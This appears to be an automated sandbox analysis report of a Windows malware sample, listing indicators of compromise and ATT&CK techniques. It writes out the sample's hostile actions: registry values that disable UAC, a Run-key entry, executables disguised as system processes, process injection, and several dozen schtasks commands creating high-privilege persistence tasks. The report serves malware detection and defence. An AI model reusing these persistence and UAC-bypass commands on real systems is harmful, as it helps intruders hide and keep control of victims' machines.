Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Public\\Downloads\\csrss.exe\""	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

OfficeClickToRun.exe007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	OfficeClickToRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	OfficeClickToRun.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ipinfo.io
30 ipinfo.io

flow	ioc
29	ipinfo.io
30	ipinfo.io

Drops file in Program Files directory 21 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\StartMenuExperienceHost.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\55b276f4edf653	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\StartMenuExperienceHost.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\RCX169F.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX265D.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\dwm.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files\7-Zip\Lang\38384e6a620884	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files\7-Zip\Lang\SearchApp.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\7-Zip\Lang\RCX116A.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\7-Zip\Lang\RCX11E8.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RCX140C.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RCX140D.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files\ModifiableWindowsApps\sihost.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\e6c9b481da804f	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\dwm.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX265C.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\7-Zip\Lang\SearchApp.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\RCX1621.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\6cb0b6c459d5d3	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Drops file in Windows directory 20 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\encapsulation\RCXD41.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\System.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\AppReadiness\SppExtComObj.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\appcompat\encapsulation\ea1d8f6d871115	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\AppReadiness\e1ef82546f0b02	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\AppReadiness\SppExtComObj.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\RCX1DE9.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\AppReadiness\RCX2448.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\Performance\WinSAT\DataStore\System.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\Performance\WinSAT\DataStore\27d1bcfc3c54e0	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\appcompat\encapsulation\upfc.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\RCX2232.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\appcompat\encapsulation\upfc.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\appcompat\encapsulation\RCXD30.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\RCX1DD8.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\spoolsv.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\Performance\WinSAT\DataStore\RCX2231.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File opened for modification	C:\Windows\AppReadiness\RCX2447.tmp	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\Performance\WinSAT\DataStore\spoolsv.exe	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
File created	C:\Windows\Performance\WinSAT\DataStore\f3b6ecef712a24	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

Processes:

OfficeClickToRun.exe007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
416	schtasks.exe
4596	schtasks.exe
848	schtasks.exe
3244	schtasks.exe
4180	schtasks.exe
3620	schtasks.exe
2716	schtasks.exe
2428	schtasks.exe
116	schtasks.exe
3520	schtasks.exe
4384	schtasks.exe
1856	schtasks.exe
1832	schtasks.exe
5084	schtasks.exe
4896	schtasks.exe
996	schtasks.exe
2112	schtasks.exe
1520	schtasks.exe
3868	schtasks.exe
4948	schtasks.exe
1956	schtasks.exe
4400	schtasks.exe
4576	schtasks.exe
1652	schtasks.exe
4004	schtasks.exe
2456	schtasks.exe
3692	schtasks.exe
3560	schtasks.exe
4728	schtasks.exe
2884	schtasks.exe
2532	schtasks.exe
4808	schtasks.exe
1108	schtasks.exe
636	schtasks.exe
216	schtasks.exe
1204	schtasks.exe
336	schtasks.exe
4680	schtasks.exe
2616	schtasks.exe
660	schtasks.exe
1412	schtasks.exe
2384	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exeOfficeClickToRun.exe

pid	process
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe
772	OfficeClickToRun.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OfficeClickToRun.exe

pid process

772 OfficeClickToRun.exe

pid	process
772	OfficeClickToRun.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exeOfficeClickToRun.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Token: SeDebugPrivilege	772	OfficeClickToRun.exe
Token: SeBackupPrivilege	3420	vssvc.exe
Token: SeRestorePrivilege	3420	vssvc.exe
Token: SeAuditPrivilege	3420	vssvc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OfficeClickToRun.exe

pid process

772 OfficeClickToRun.exe

pid	process
772	OfficeClickToRun.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.execmd.exeOfficeClickToRun.exe

description	pid	process	target process
PID 4888 wrote to memory of 2680	4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe	cmd.exe
PID 4888 wrote to memory of 2680	4888	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe	cmd.exe
PID 2680 wrote to memory of 2168	2680	cmd.exe	w32tm.exe
PID 2680 wrote to memory of 2168	2680	cmd.exe	w32tm.exe
PID 2680 wrote to memory of 772	2680	cmd.exe	OfficeClickToRun.exe
PID 2680 wrote to memory of 772	2680	cmd.exe	OfficeClickToRun.exe
PID 772 wrote to memory of 4424	772	OfficeClickToRun.exe	WScript.exe
PID 772 wrote to memory of 4424	772	OfficeClickToRun.exe	WScript.exe
PID 772 wrote to memory of 1616	772	OfficeClickToRun.exe	WScript.exe
PID 772 wrote to memory of 1616	772	OfficeClickToRun.exe	WScript.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

Processes:

OfficeClickToRun.exe007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	OfficeClickToRun.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe
"C:\Users\Admin\AppData\Local\Temp\007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594.exe"
1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fx2jfj43P9.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:2168
- - C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe
    "C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe"
    3⤵
    - UAC bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:772
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b27a1db-8adc-4e29-80bd-8678f793ab30.vbs"
      4⤵
      PID:4424
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f682d0a2-a8f8-4b9d-b5fd-d4ab878190ec.vbs"
      4⤵
      PID:1616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\All Users\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\encapsulation\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 11 /tr "'C:\Windows\appcompat\encapsulation\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\AppV\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\AppV\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\AppV\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\PackageManifests\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\Performance\WinSAT\DataStore\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Windows\Performance\WinSAT\DataStore\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Downloads\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Downloads\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\WinSAT\DataStore\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456

